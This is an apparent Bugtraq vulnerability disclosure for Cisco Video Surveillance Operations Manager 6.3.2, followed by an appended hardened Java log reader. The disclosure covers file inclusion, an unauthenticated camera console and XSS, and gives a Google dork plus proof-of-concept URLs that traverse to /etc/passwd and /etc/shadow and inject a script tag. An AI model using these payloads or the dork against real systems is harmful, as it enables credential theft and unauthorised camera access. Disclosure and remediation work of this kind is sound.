Cisco Video Surveillance Operations Manager Multiple vulnerabili

Board: Bugtraq | Posted: 13 years ago (2013/04/27 12:32)
# Exploit Title: Cisco Video Surveillance Operations Manager Multiple vulnerabilities
# Google Dork: intitle:"Video Surveillance Operations Manager > Login"
# Date: 22 Feb 2013 reported to the vendor
# Exploit Author: Bassem | bassem.co
# Vendor Homepage: www.cisco.com
# Version: Version 6.3.2
# Tested on: Version 6.3.2

#1- The application is vulnerable to Local file inclusion

read_log.jsp and read_log.dep do not validate the name and location of the
log file; an unauthenticated remote attacker can perform this

---------------------------------------------
read_log.jsp:
/usr/BWhttpd/root/htdocs/BWT/utils/logs
from /usr/BWhttpd/logs/<%= logName %>
---------------------------------------------
---------------------------------------------
read_log.dep

<%!
protected LinkedList getBwhttpdLog( String logName, String theOrder )
{
    String logPath = "/usr/BWhttpd/logs/";
    String theLog = logPath + logName;
    LinkedList resultList = new LinkedList();
    try
    {
        BufferedReader in = new BufferedReader(new FileReader(theLog));
        String theLine = "";
        while( (theLine = in.readLine()) != null )
        {
            if( theOrder.indexOf("descending") > -1 )
            {
                resultList.addFirst(theLine);
            }
            else
            {
                resultList.addLast(theLine);
            }
        }
-----------------------------------------------

POC:
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow

#####################################################################

#2- The application is vulnerable to local file inclusion

Select and display log does not validate the log file names. If an attacker
passes /etc/passwd through the HTTP POST request, the system will display it
as a log file

POC:
http://serverip/monitor/logselect.php

#####################################################################

#3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't
perform the proper authentication for the management and view console.
A remote attacker can gain access to the system and view the attached
cameras without authentication

POC:
http://serverip/broadware.jsp

#####################################################################

#4 Application is vulnerable to XSS

The web application doesn't perform validation for the inputs/outputs
for many of its pages, so it's vulnerable to XSS attacks

POC:
http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>
Article ID (AID): #1HUrJIKA (Bugtraq)
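A hardened counterpart to the getBwhttpdLog() excerpt quoted in item #1, added here as an illustration of the missing name and location check; it is not code from the advisory or from Cisco. The class name SafeLogReader, the readLog signature, the allowed-character pattern and the temp-directory sample data are assumptions made for the example, and it does not address the missing authentication described in the post.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.LinkedList;

public class SafeLogReader {
    // Hypothetical replacement for getBwhttpdLog(); logRoot is a parameter so the
    // demo can use a temp directory instead of /usr/BWhttpd/logs/.
    static LinkedList<String> readLog(Path logRoot, String logName, String theOrder)
            throws IOException {
        // Accept a bare file name only: no separators, no "..", no empty value.
        if (logName == null || !logName.matches("[A-Za-z0-9._-]+") || logName.contains("..")) {
            throw new SecurityException("rejected log name");
        }
        // toRealPath() resolves symlinks, so a link inside the log directory that
        // points elsewhere fails the containment check below.
        Path root = logRoot.toRealPath();
        Path target = root.resolve(logName).toRealPath();
        if (!target.startsWith(root) || !Files.isRegularFile(target)) {
            throw new SecurityException("path escapes log directory");
        }
        LinkedList<String> result = new LinkedList<>();
        try (BufferedReader in = Files.newBufferedReader(target, StandardCharsets.UTF_8)) {
            String line;
            while ((line = in.readLine()) != null) {
                if (theOrder != null && theOrder.contains("descending")) {
                    result.addFirst(line);
                } else {
                    result.addLast(line);
                }
            }
        }
        return result;
    }
    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("bwlogs"); // constructed sample data
        Files.write(root.resolve("access_log"), "a\nb\n".getBytes(StandardCharsets.UTF_8));
        System.out.println(readLog(root, "access_log", "descending"));
        for (String bad : new String[] {"../../etc/passwd", "/etc/passwd", ".."}) {
            try {
                readLog(root, bad, "");
                System.out.println("NOT rejected: " + bad);
            } catch (SecurityException e) {
                System.out.println("rejected " + bad + ": " + e.getMessage());
            }
        }
    }
}
```

A request for a name that does not exist in the log directory surfaces as an IOException from toRealPath(), which the caller should turn into a generic error rather than echoing the path.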